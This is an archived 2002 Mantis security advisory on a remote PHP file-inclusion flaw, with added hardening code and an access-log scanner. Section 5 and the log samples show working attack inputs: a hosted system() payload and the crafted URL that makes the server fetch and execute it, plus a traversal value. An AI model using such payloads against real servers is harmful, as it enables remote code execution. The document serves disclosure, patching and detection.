[Mantis Advisory/2002-04] Arbitrary code execution vulnerability in Mantis

From: Jeroen Latour (jlatourat_private)
Date: Sun Aug 18 2002 - 23:48:53 PDT


    
       0. Table of Contents
    
         1. Introduction
         2. Summary / Impact analysis
         3. Affected versions
         4. Workaround / Solution
         5. Detailed explanation
         6. Credit
         7. Contact details
    
       1. Introduction
    
    Mantis is an Open Source web-based bug-tracking system, written in PHP, 
    which uses the MySQL database server. It is being actively developed by a 
    small group of developers, and is considered to be in the beta stage.
    
       2. Summary / Impact analysis
    
    Mantis includes code which uses the JpGraph library to generate some 
    statistical graphs. Some of this code is stored in an include file, 
    summary_graph_functions.php. This file takes care of loading the JpGraph 
    library, using an include() statement whose path is built from the 
    $g_jpgraph_path variable.
    
    The path to the JpGraph library is stored in the configuration file. 
    However, summary_graph_functions.php does not load the configuration file 
    itself, but expects the scripts that include it to have done so already.
    
    A vulnerability opens up when summary_graph_functions.php is requested 
    directly in a browser: the configuration file is never loaded, so 
    $g_jpgraph_path is left undefined and, with PHP's register_globals setting 
    enabled (the default at the time), any value supplied as a GET, POST or 
    cookie parameter of that name is used instead. A malicious user can 
    therefore execute arbitrary PHP code as the webserver user by setting 
    $g_jpgraph_path to a local path or, where allow_url_fopen is enabled, to a 
    URL.
    This vulnerability has been closed in Mantis 0.17.4.
    
       3. Affected versions
    
    The following versions are known to be affected:
       Mantis 0.17.3
       Mantis 0.17.2
       Mantis 0.17.1
       Mantis 0.17.0
       Mantis 0.16.1
       Mantis 0.16.0
       Mantis 0.15.12
       Mantis 0.15.11
       Mantis 0.15.10
       Mantis 0.15.9
       Mantis 0.15.8
       Mantis 0.15.7
       Mantis 0.15.6
       Mantis 0.15.5
       Mantis 0.15.4
       Mantis 0.15.3
    
    The following versions are known to be unaffected:
       Mantis 0.17.4a
       Mantis 0.17.4
       Any version below Mantis 0.15.3
    
       4. Workaround / Solution
    
    Mantis 0.17.4 adds various checks which prevent this vulnerability.
    All users are recommended to upgrade to this version as soon as possible.
    
    If an upgrade is not possible, the vulnerability can be closed by inserting 
    the following lines at the top of summary_graph_functions.php. They abort 
    the script whenever a caller tries to supply $g_jpgraph_path through the 
    request, i.e. through any of the GET, POST and cookie sources that 
    register_globals imports into the global scope:
       if ( isset($HTTP_GET_VARS['g_jpgraph_path']) ||
         isset($HTTP_POST_VARS['g_jpgraph_path']) ||
         isset($HTTP_COOKIE_VARS['g_jpgraph_path']) ) {
           exit;
       }
    This stops the request-parameter vector described in this advisory but 
    still leaves the include file directly requestable, so upgrading remains 
    the preferred fix.
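The following is an added example and not code from Mantis or from this advisory. It places the include pattern described in sections 2 and 5 next to a hardened form of the section 4 workaround. $g_jpgraph_path and jpgraph.php are taken from the advisory; the $g_config_loaded flag, the function names and the assumption that the configuration file sets that flag are inventions of this example.

```php
<?php
// Added example, not code from Mantis or from the advisory: the include
// pattern described in sections 2 and 5, next to a hardened version of the
// workaround from section 4. $g_jpgraph_path and jpgraph.php come from the
// advisory; $g_config_loaded and the function names are assumptions.

// Vulnerable pattern. With register_globals on, a request such as
//   summary_graph_functions.php?g_jpgraph_path=http://server.mynetwork.net/listings.txt?
// defines $g_jpgraph_path before this runs, and with allow_url_fopen on
// include() fetches the remote file and executes it as PHP.
function load_jpgraph_vulnerable()
{
    global $g_jpgraph_path;
    include($g_jpgraph_path . 'jpgraph.php');
}

// Hardened version: three independent checks, any one of which alone blocks
// the attack described in the advisory.
function load_jpgraph_hardened()
{
    global $g_jpgraph_path, $g_config_loaded;

    // 1. The configuration file must have run first. Assumed here: the
    //    config file sets $g_config_loaded = true after defining $g_jpgraph_path.
    if (empty($g_config_loaded)) {
        header('HTTP/1.0 403 Forbidden');
        exit('summary_graph_functions.php must not be requested directly.');
    }

    // 2. Never accept the variable from the request, whichever source
    //    register_globals would import it from. ($_GET/$_POST/$_COOKIE are
    //    the PHP >= 4.1 names for the $HTTP_*_VARS arrays in the advisory.)
    foreach (array($_GET, $_POST, $_COOKIE) as $source) {
        if (isset($source['g_jpgraph_path'])) {
            exit;
        }
    }

    // 3. Only a local directory that actually contains jpgraph.php is allowed.
    if (!is_safe_local_library_dir($g_jpgraph_path)) {
        exit;
    }
    include($g_jpgraph_path . 'jpgraph.php');
}

// Returns true only for a plain local directory containing jpgraph.php.
// Rejects URL wrappers (http://, ftp://, php://, ...), NUL bytes and paths
// that do not resolve, so neither a remote file nor a ../ traversal target
// can be loaded.
function is_safe_local_library_dir($path)
{
    if (!is_string($path) || $path === '') {
        return false;
    }
    if (strpos($path, "\0") !== false) {
        return false;
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return false; // any scheme:// prefix, i.e. a stream wrapper
    }
    $real = realpath($path);
    if ($real === false || !is_dir($real)) {
        return false;
    }
    return is_file($real . DIRECTORY_SEPARATOR . 'jpgraph.php');
}
```

Check 3 is the one that survives even if register_globals is later re-enabled on a patched host: the value reaching include() can only name an existing local directory, never a URL. Check 1 is the root-cause fix, since the file was never meant to be executed on its own.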
    
       5. Detailed explanation
    
    To exploit this vulnerability, an attacker only has to store the PHP code 
    they wish to execute in a text file, make this available on a webserver 
    accessible by the Mantis installation and point the $g_jpgraph_path 
    variable to that location.
    
    For example, we create a file with the following content:
       <?php
         system('ls');
         exit;
       ?>
    
    We make this file available on a webserver, for example at 
    http://server.mynetwork.net/listings.txt
    If the Mantis installation does not have access to the internet, the file 
    should be stored on an internal server.
    
    We then point our browser to 
    http://mantis.server.com/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fserver.mynetwork.net%2Flistings.txt%3F
    
    This will execute the following call:
       include('http://server.mynetwork.net/listings.txt?jpgraph.php');
    
    The trailing "?" (encoded as %3F) in the supplied value turns the filename 
    'jpgraph.php' that the script appends into a query string, which the 
    attacker's webserver simply ignores, so listings.txt is what gets fetched.
    Provided allow_url_fopen is enabled, this instructs PHP to download 
    listings.txt and parse it as a PHP script. In this case, the browser should 
    print a file listing of the current directory.
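The exploit above leaves a recognisable trace in the web server's access log. The following added example, which is not part of the advisory or of Mantis, scans log lines for direct requests to summary_graph_functions.php and flags those that carry a g_jpgraph_path parameter, distinguishing remote-URL values from local ones. The log lines are constructed for this example; only the hostnames mirror the advisory's.

```php
<?php
// Added example, not part of the advisory or of Mantis: scan an Apache
// common/combined-format access log for attempts to exploit this issue.
// The log lines below are constructed for this example.

$sample_log = <<<'LOG'
10.0.0.5 - - [18/Aug/2002:23:48:53 -0700] "GET /mantis/summary_graph.php HTTP/1.0" 200 4123
192.0.2.17 - - [19/Aug/2002:01:02:03 -0700] "GET /mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fserver.mynetwork.net%2Flistings.txt%3F HTTP/1.0" 200 512
192.0.2.17 - - [19/Aug/2002:01:02:10 -0700] "GET /mantis/summary_graph_functions.php?g_jpgraph_path=..%2F..%2F..%2Ftmp%2F HTTP/1.0" 200 0
198.51.100.9 - - [19/Aug/2002:01:05:00 -0700] "GET /mantis/summary_graph_functions.php HTTP/1.0" 200 0
203.0.113.4 - - [19/Aug/2002:01:06:00 -0700] "GET /mantis/view_bug_page.php?bug_id=12 HTTP/1.0" 200 9000
LOG;

// Returns one record per direct request for summary_graph_functions.php.
// A request that also carries g_jpgraph_path is an exploitation attempt;
// 'remote' marks values that would make include() fetch over the network.
function find_jpgraph_injection_attempts($log)
{
    $hits = array();
    foreach (explode("\n", trim($log)) as $line) {
        // Client address first, then the quoted request line.
        if (!preg_match('/^(\S+) .*?"(GET|POST|HEAD) (\S+) HTTP\/[0-9.]+"/', $line, $m)) {
            continue;
        }
        $url = parse_url($m[3]);
        if (!isset($url['path']) || basename($url['path']) !== 'summary_graph_functions.php') {
            continue;
        }
        $params = array();
        if (isset($url['query'])) {
            parse_str($url['query'], $params); // also URL-decodes the value
        }
        $injected = isset($params['g_jpgraph_path']) ? $params['g_jpgraph_path'] : null;
        $hits[] = array(
            'client'   => $m[1],
            'method'   => $m[2],
            'injected' => $injected,
            'remote'   => $injected !== null
                          && preg_match('#^[a-z][a-z0-9+.\-]*://#i', $injected) === 1,
        );
    }
    return $hits;
}

foreach (find_jpgraph_injection_attempts($sample_log) as $hit) {
    printf("%-14s %-4s %s%s\n",
        $hit['client'],
        $hit['method'],
        $hit['injected'] === null
            ? 'direct request, no parameter'
            : 'g_jpgraph_path=' . $hit['injected'],
        $hit['remote'] ? '  [REMOTE INCLUDE]' : '');
}
```

Run from the command line, this reports the two 192.0.2.17 requests (the first marked as a remote include, the second as a local ../ path) and the bare direct request from 198.51.100.9, and ignores the ordinary Mantis pages. Only the GET form is visible this way: POST bodies and cookies, which register_globals imports just the same, are not written to the access log, so the log scan complements rather than replaces the guard in the file itself.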
    
       6. Credit
    
    This vulnerability was reported by Joao Gouveia (tharbadat_private).
    
       7. Contact details
    
    The latest version of Mantis is always available from:
         http://mantisbt.sourceforge.net/
    The current version is 0.17.4a, which can be downloaded from
         http://mantisbt.sourceforge.net/download.php3
    
    If you have any questions about this vulnerability, or wish to report 
    another, you can contact the developers at:
         mantisbt-securityat_private
    This is a private mailing list, readable only by a few developers.
    
    The latest version of this and other advisories can be found at:
         http://mantisbt.sourceforge.net/security.php3
    



    This archive was generated by hypermail 2b30 : Mon Aug 19 2002 - 15:32:06 PDT